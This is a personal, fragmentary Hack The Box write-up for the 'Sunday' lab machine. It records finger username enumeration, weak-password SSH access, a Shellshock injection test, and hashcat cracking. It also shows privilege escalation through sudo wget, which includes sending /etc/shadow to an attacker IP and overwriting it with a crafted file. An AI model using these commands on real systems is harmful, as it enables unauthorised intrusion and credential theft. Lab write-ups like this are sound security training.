HTB Write-up Sunday
What I learned today:
Nmap: -p- --max-retries 1 (or 0) - this speeds up the all port scan a bit.
Port 79 fingerprint service , https://en.wikipedia.org/wiki/Finger_%28protocol%29
it revealed some usernames on the service with the finger-user-enum tool.
ssh: add keyalgorithm with -okexAlgorithms=+ALGORITHM_ NAME
By using |less -s kills off line wrapping (otherwise, the output is too messy)
For ssh password cracking, use patator
sytax:
Wget
wget -i to read files
wget --post-file=FILE_PATH IP to upload a file to kali (nc open on 80)
Create a hash
Regular enumuration won't show the extra ports that are open which includes SSH port.
do -p- scan even though it takes forever (speed it up by doing -p- --max-retries 1 (or 0) ---> once we find weird ports, do port-specific scan like
Port 79 fingerprint service , https://en.wikipedia.org/wiki/Finger_%28protocol%29
Enumeration-
For finger enum, I used
For usernames, used /usr/share/seclists/Usernames/Names/names.txt
Syntax:
By using |less -s kills off line wrapping (otherwise, the output is too messy)
We got sammy and sunny
We can try to ssh into it. The password for sammy account was sunny.
When you try to login, it might give this error;
"No matching key exchange method found. Their offer : ~"
Try to add the key algorithm with "-okexAlgorithms=+ALGORITHM_ NAME"
Now we are in.
SSH Password Cracking
For ssh password cracking, use patator
sytax:
use a password list that's not too big or create your own password list.
515 printer
Found info about LPD here and tried it but didn't get the result - negative acknowledgement. \
oh wait...
python lpdtest.py 10.129.159.222 in '() {:;}; ping -c1 10.10.14.125'
I used the above command and it executed it...
Does that mean we can get the shell back?
--- didn't work.
Priv Esc
When looking into the files, we found a backup file.
found a shadow file.
Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt
Cracked the password for summy.
Switched user to sammy with the password.
Now it's showing that the system name - SunOS 5.11 -maybe vulnerable to shellshock?
If this worked it's possible that the system is vulnerable to shellshock
no env valuables.
do env and just pick one to use.
Looks like it's not vulnerable this time.
When checking sammy's sudo -l,
wget is available. wget -h to see all the options we could use:
wget -i enabled us to see root files.
Create a file called "troll" with content like below.
Upload it with the sammy account:
and switch back to sunny to execute it(who has sudo access)
In this particular box, there's a task that's overwriting the file.
to prevent this,
let's have two ssh sessions open: one from the sammy (Wget to upload the file) and one from Sunny(to execute the file)
and on sammy, use
to make the system sleep for 5 seconds, and then quickly run the file on the sammy
for some reason, I couldn't execute the /root/troll, I'm going to try another method.
Used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to kali (nc open on 80)
Created a new file called shadow:
Create a new hash
Paste the hash to the top
Upload the shadow file to sammy account
sudo wget 10.10.14.131/shadow /etc/shadow
We can confirm that the shadow file got updated here.
With the new pass, I got in!
Last updated